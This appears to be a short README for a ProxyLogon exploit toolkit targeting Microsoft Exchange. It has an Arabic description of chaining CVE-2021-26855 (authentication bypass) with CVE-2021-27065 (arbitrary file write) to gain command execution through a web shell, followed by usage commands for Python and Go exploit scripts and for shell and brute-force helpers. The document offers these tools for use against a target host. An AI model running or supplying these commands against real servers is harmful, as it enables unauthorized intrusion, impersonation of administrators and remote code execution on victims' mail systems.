
ProxyLogon (CVE-2021-26855+CVE-2021-27065) Exchange Server RCE (SSRF->GetWebShell)
ProxyLogon هو الاسم العام الرسمي لـ CVE-2021-26855، وهي ثغرة أمنية في خادم Microsoft Exchange تسمح للمهاجم بتجاوز المصادقة وانتحال هوية المسؤول. قمنا أيضًا بربط هذه الثغرة بثغرة أخرى لكتابة ملف عشوائي بعد المصادقة، وهي CVE-2021-27065، للحصول على تنفيذ الأوامر.
usage:
sudo python3 proxylogon.py --host=target.com [email protected]
sudo python3 proxylogon.py --host=target.com --mails=./mails.txt
usage:
go run proxylogon.go -u target.com -e [email protected]
sudo python2 /manual/check.py
sudo python2 /manual/shell.py
sudo python2 /manual/brute.py